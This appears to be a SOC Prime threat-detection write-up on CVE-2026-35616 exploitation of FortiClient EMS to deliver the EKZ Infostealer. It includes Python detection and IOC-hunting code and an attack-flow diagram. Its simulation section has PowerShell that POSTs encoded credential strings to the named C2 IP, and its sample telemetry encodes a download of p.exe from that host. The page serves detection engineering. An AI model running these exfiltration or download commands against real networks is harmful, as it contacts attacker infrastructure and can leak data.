SOC Prime Bias: Critical

29 May 2026 07:30 UTC

FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Arctic Wolf identified a campaign that exploited CVE-2026-35616 in FortiClient EMS to distribute a malicious PowerShell script to managed endpoints. That script retrieved and launched a credential-stealing payload known as EKZ Infostealer while posing as a legitimate Fortinet patch. The malware collected browser passwords, cookies, and autofill information, then exfiltrated the stolen data over HTTP. By abusing trusted EMS configuration channels, the attackers were able to execute the payload quickly across multiple managed devices.

Investigation

Researchers recreated the exploit by sending specially crafted unauthenticated HTTP requests to FortiClient EMS APIs, resulting in configuration changes that inserted malicious scripts. Execution traces showed fortitray.exe or ipsec.exe spawning cmd.exe, which in turn launched a Base64-encoded PowerShell command that downloaded p.exe from a malicious IP address. The payload wrote a log.txt file to ProgramData, sent the captured data back to the same server, and then deleted itself.
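The execution chain described above (an EMS client process spawning cmd.exe, which launches Base64-encoded PowerShell that pulls p.exe from the C2 address) is what the process-creation and network-connection rules listed under Detections key on. The following Python is an added example written for this page, not SOC Prime's rule code or Arctic Wolf's tooling: it decodes `-EncodedCommand` arguments the way PowerShell defines them (Base64 over UTF-16LE), flags the parent/child pairing, and rates findings by whether the decoded script references the C2 named in the write-up. The event dictionaries are constructed sample telemetry in an assumed Sysmon-like shape (`parent_image`, `image`, `command_line`, `dest_ip`, `dest_port`); only the process names, the IP and the payload path come from the page.

```python
import base64
import re
from urllib.parse import urlparse

# Process names, C2 address and payload path come from the write-up above.
EMS_CLIENT_PROCESSES = {"fortitray.exe", "ipsec.exe"}
KNOWN_C2_HOSTS = {"83.138.53.110"}

_URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _basename(path):
    """Image name without its directory, lower-cased (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell defines the argument as Base64 over UTF-16LE text, so anything
    that fails to decode that way is not a valid encoded command."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_events(events):
    """Flag the EMS-client -> cmd.exe -> encoded PowerShell chain.

    `events` are dicts with keys id, parent_image, image, command_line (an
    assumed Sysmon-like shape). Returns one finding dict per suspicious event."""
    findings = []
    for ev in events:
        parent, image = _basename(ev["parent_image"]), _basename(ev["image"])
        if parent in EMS_CLIENT_PROCESSES and image == "cmd.exe":
            findings.append({"id": ev["id"], "severity": "high", "urls": [],
                             "reason": f"{parent} spawned cmd.exe (EMS script abuse)"})
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(ev["command_line"])
            if decoded is None:
                continue
            urls = _URL_RE.findall(decoded)
            if not urls:
                continue  # encoded but no remote target: leave to baseline review
            hosts = {urlparse(u).hostname for u in urls}
            findings.append({"id": ev["id"], "urls": urls,
                             "severity": "critical" if hosts & KNOWN_C2_HOSTS else "medium",
                             "reason": "encoded PowerShell references a remote URL"})
    return findings


def analyze_network_events(events):
    """Flag PowerShell connecting to the known C2 over plain HTTP.

    `events` are dicts with keys id, image, dest_ip, dest_port (assumed shape,
    mirroring a Windows network-connection event)."""
    return [ev["id"] for ev in events
            if _basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and ev["dest_ip"] in KNOWN_C2_HOSTS and ev["dest_port"] == 80]


def _enc(ps):
    """Encode text the way PowerShell expects -EncodedCommand (sample data only)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample telemetry modelled on the process chain in the write-up.
SAMPLE_PROCESS_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell.exe -w hidden -enc <base64>"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc "
     + _enc("Invoke-WebRequest http://83.138.53.110/dl/p.exe -OutFile p.exe")},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",      # benign encoded command
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -EncodedCommand " + _enc("Get-Date")},
    {"id": 4, "parent_image": r"C:\Windows\System32\cmd.exe",  # unknown host: review
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ec " + _enc("iwr http://intranet.example/update")},
]
SAMPLE_NETWORK_EVENTS = [
    {"id": 10, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": "83.138.53.110", "dest_port": 80},
    {"id": 11, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443},   # TEST-NET address, benign
]

if __name__ == "__main__":
    for f in analyze_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{f['severity']}] event {f['id']}: {f['reason']} {f['urls']}")
    print("network hits:", analyze_network_events(SAMPLE_NETWORK_EVENTS))
```

Decoding the argument with `validate=True` and UTF-16LE rejects junk that merely looks like Base64, which keeps the rule from firing on every `-e` switch; event 3 shows an encoded command that decodes cleanly but carries no remote reference and is therefore left for baseline review rather than alerted on.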

Mitigation

Organizations should update FortiClient EMS to a version that fixes CVE-2026-35616 and restrict API access to approved source IP addresses. Defenders should also review EMS logs for certificate-related errors and unexpected changes to Remote Access Profiles. Outbound HTTP traffic from endpoints to unknown IP addresses should be blocked, and script execution within VPN profile workflows should be limited through least-privilege controls.

Response

If this activity is detected, isolate affected hosts immediately, revoke any unauthorized EMS accounts that may have been created, and remove malicious script files from the FortiClient logs directory. Investigators should preserve the log.txt artifact, calculate hashes for the malicious binaries, and hunt for matching indicators across the environment. Exposed browser credentials should be reset, and teams should monitor for suspicious authentication activity that may follow the theft.
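The hashing and hunting steps above, together with the SHA256/SHA1/MD5 IOC rules listed under Detections, amount to a single sweep: hash every file once, compare against each indicator set, and preserve what is found. The Python below is an added example written for this page, not SOC Prime's or Arctic Wolf's code. It computes all three digests in one read pass, matches them against per-algorithm IOC sets, additionally flags files carrying the artifact names from the write-up (log.txt, p.exe, FortiEndpoint_Patch.exe) so that a hash match can be told apart from a name-only hit, and copies an artifact into an evidence folder with its hash verified on both sides. The page publishes no hash values, so `build_sample_tree` seeds the IOC set from a constructed placeholder file; the directory layout it creates is likewise constructed.

```python
import hashlib
import os
import shutil
import tempfile

# Artifact names taken from the write-up; real IOC hashes are not on this page,
# so the sample below derives its "IOC" from a constructed file.
KNOWN_ARTIFACT_NAMES = {"log.txt", "p.exe", "fortiendpoint_patch.exe"}
CHUNK = 1 << 16


def hash_file(path):
    """One read pass producing the three digest types the IOC rules above use."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            for h in digests.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in digests.items()}


def hunt(root, iocs):
    """Walk `root` and return files matching an IOC hash or a known artifact name.

    `iocs` maps algorithm name ("md5" | "sha1" | "sha256") to a set of lower-case
    hex digests. Each hit records which indicator fired so the analyst can tell a
    hash match (strong) from a filename match (needs triage)."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                digests = hash_file(path)
            except OSError:
                continue  # unreadable or locked file: skip it, do not abort the sweep
            matched = [alg for alg, value in digests.items()
                       if value in iocs.get(alg, set())]
            if name.lower() in KNOWN_ARTIFACT_NAMES:
                matched.append("name:" + name.lower())
            if matched:
                hits.append({"path": path, "matched": matched, "sha256": digests["sha256"]})
    return hits


def preserve_artifact(path, evidence_dir):
    """Copy an artifact (e.g. log.txt) into an evidence folder and record its hash.

    The SHA-256 is taken before and after the copy so the preserved copy can be
    shown to be identical to the original."""
    os.makedirs(evidence_dir, exist_ok=True)
    before = hash_file(path)["sha256"]
    dest = os.path.join(evidence_dir, os.path.basename(path))
    shutil.copy2(path, dest)
    after = hash_file(dest)["sha256"]
    if before != after:
        raise RuntimeError("evidence copy does not match original")
    with open(os.path.join(evidence_dir, "hashes.txt"), "a") as fh:
        fh.write(f"{after}  {os.path.basename(path)}\n")
    return {"dest": dest, "sha256": after}


def build_sample_tree():
    """Constructed directory layout mimicking the paths from the write-up.

    Returns (root, iocs): the IOC set is seeded with the SHA-256 of the
    constructed 'binary', standing in for the hashes from the SOC Prime rules.
    The binary is deliberately renamed so only the hash, not the name, catches it."""
    root = tempfile.mkdtemp(prefix="ekz_hunt_")
    os.makedirs(os.path.join(root, "ProgramData"))
    os.makedirs(os.path.join(root, "Temp"))
    os.makedirs(os.path.join(root, "Users", "alice"))
    with open(os.path.join(root, "Temp", "dropper.bin"), "wb") as fh:
        fh.write(b"MZ\x90\x00constructed-sample-not-a-real-binary")
    with open(os.path.join(root, "ProgramData", "log.txt"), "w") as fh:
        fh.write("constructed placeholder for the collected-data log\n")
    with open(os.path.join(root, "Users", "alice", "notes.txt"), "w") as fh:
        fh.write("benign file\n")
    iocs = {"sha256": {hash_file(os.path.join(root, "Temp", "dropper.bin"))["sha256"]}}
    return root, iocs


if __name__ == "__main__":
    root, iocs = build_sample_tree()
    for hit in hunt(root, iocs):
        print(hit["path"], hit["matched"])
    print(preserve_artifact(os.path.join(root, "ProgramData", "log.txt"),
                            os.path.join(root, "evidence")))
```

Unreadable files are skipped rather than aborting the walk, because a live host will have locked files and the sweep must still complete; on the real estate, replace the constructed IOC set with the digests from the rules above and point `root` at the volumes to be checked.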

Attack Flow

```mermaid
graph TB
  %% Class definitions
  classDef action fill:#99ccff
  classDef process fill:#ffcc99
  classDef tool fill:#cccccc
  classDef malware fill:#ff9999
  classDef file fill:#ccffcc
  classDef technique fill:#ddeeff

  %% Nodes
  action_initial_access["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>CVE-2026-35616 in FortiClient EMS API"]
  class action_initial_access action
  process_api_requests["<b>Process</b> – Unauthenticated API requests processed as privileged admin actions"]
  class process_api_requests process
  action_cmd_launch["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/>fortitray.exe & ipsec.exe launch cmd.exe"]
  class action_cmd_launch action
  action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Base64-encoded PowerShell script execution"]
  class action_powershell action
  technique_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payload delivered as base64"]
  class technique_obfuscation technique
  technique_decode["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Runtime base64 decoding"]
  class technique_decode technique
  action_download["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/>Download FortiEndpoint_Patch.exe (p.exe)"]
  class action_download action
  file_payload["<b>File</b> – FortiEndpoint_Patch.exe (p.exe)<br/>Hosted at http://83.138.53.110/dl/p.exe"]
  class file_payload file
  action_execute["<b>Action</b> – <b>T1203 Exploitation for Client Execution</b><br/>Silent execution of downloaded binary"]
  class action_execute action
  malware_infostealer["<b>Malware</b> – EKZ Infostealer<br/>Collects credentials, cookies, autofill data"]
  class malware_infostealer malware
  technique_cred_access["<b>Technique</b> – <b>T1555.003 Credentials from Web Browsers</b>"]
  class technique_cred_access technique
  file_log["<b>File</b> – C:\ProgramData\log.txt<br/>Collected data storage"]
  class file_log file
  action_exfil["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>HTTP POST to attacker server"]
  class action_exfil action
  action_cleanup["<b>Action</b> – <b>T1564 Hide Artifacts</b><br/>Delete malicious files and log"]
  class action_cleanup action

  %% Connections
  action_initial_access -->|leads_to| process_api_requests
  process_api_requests -->|triggers| action_cmd_launch
  action_cmd_launch -->|executes| action_powershell
  action_powershell -->|uses| technique_obfuscation
  technique_obfuscation -->|requires| technique_decode
  action_powershell -->|downloads| action_download
  action_download -->|retrieves| file_payload
  file_payload -->|executed_by| action_execute
  action_execute -->|runs| malware_infostealer
  malware_infostealer -->|performs| technique_cred_access
  malware_infostealer -->|writes| file_log
  file_log -->|sent_by| action_exfil
  action_exfil -->|followed_by| action_cleanup
  action_cleanup -->|deletes| file_payload
  action_cleanup -->|deletes| file_log
```

Detections

Short File Name (via cmdline)

SOC Prime Team
28 May 2026

Suspicious CURL Usage (via cmdline)

SOC Prime Team
28 May 2026

Call Suspicious .NET Methods from Powershell (via powershell)

SOC Prime Team
28 May 2026

Possible Bits Transfer Activity (via powershell)

SOC Prime Team
28 May 2026

IOCs (HashSha256) to detect: FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime AI Rules
28 May 2026

IOCs (HashSha1) to detect: FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime AI Rules
28 May 2026

IOCs (HashMd5) to detect: FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime AI Rules
28 May 2026

IOCs (SourceIP) to detect: FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime AI Rules
28 May 2026

IOCs (DestinationIP) to detect: FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch

SOC Prime AI Rules
28 May 2026

EKZ Infostealer Credential Exfiltration via HTTP POST [Windows Network Connection]

SOC Prime AI Rules
28 May 2026

FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer [Windows Process Creation]

SOC Prime AI Rules
28 May 2026

PowerShell Execution via FortiClient to Deliver EKZ Infostealer [Windows Powershell]

SOC Prime AI Rules
28 May 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker has previously harvested credentials from the Windows registry (T1216 family) using EKZ Infostealer. To exfiltrate the collected blob, the malware launches a PowerShell one‑liner that POSTs the Base64‑encoded credentials to its command‑and‑control server at 83.138.53.110. The use of PowerShell (Invoke-WebRequest) is a classic living‑off‑the‑land technique that evades binary‑based detections while still producing network telemetry observable by the firewall.

    ```powershell
    # Simulated credential payload (Base64 of "user:pass")
    $payload = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("administrator:Password123!"))
    $uri = "http://83.138.53.110/collect"
    Invoke-WebRequest -Uri $uri -Method POST -Body $payload -ContentType "application/x-www-form-urlencoded"
    ```
  • Regression Test Script: This self‑contained PowerShell script reproduces the exfiltration step and can be rerun for future regressions.

    ```powershell
    <#
    .SYNOPSIS
        EKZ Infostealer credential exfiltration simulation (HTTP POST).
    
    .DESCRIPTION
        Generates a fake credential blob, encodes it, and POSTs it to the
        known malicious IP used in the detection rule.
    
    .NOTES
        Requires outbound HTTP allowed to 83.138.53.110 on port 80.
    #>
    
    # ---- Preparation ----
    $creds   = "admin_user:SuperSecret!"
    $b64     = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($creds))
    $target  = "http://83.138.53.110/collect"
    
    # ---- Execution ----
    try {
        Write-Host "[*] Sending credential blob to $target ..."
        $resp = Invoke-WebRequest -Uri $target -Method POST -Body $b64 -ContentType "application/x-www-form-urlencoded" -UseBasicParsing
        Write-Host "[+] HTTP Status:" $resp.StatusCode
    } catch {
        Write-Error "[-] POST failed: $_"
    }
    
    # ---- End of script ----
    ```
  • Cleanup Commands: No persistent artifacts are created on disk, but to be thorough we clear the PowerShell variables the script created. The request above was made without -SessionVariable, so no web session object exists to close, and there is no Remove-WebRequestSession cmdlet to call.

    ```powershell
    # Cleanup: remove the variables created by the simulation.
    # Invoke-WebRequest was called without -SessionVariable, so no session object
    # was kept; removing the variables is the only cleanup required.
    Remove-Variable -Name creds,b64,target,resp -ErrorAction SilentlyContinue
    Write-Host "[*] Cleanup complete."
    ```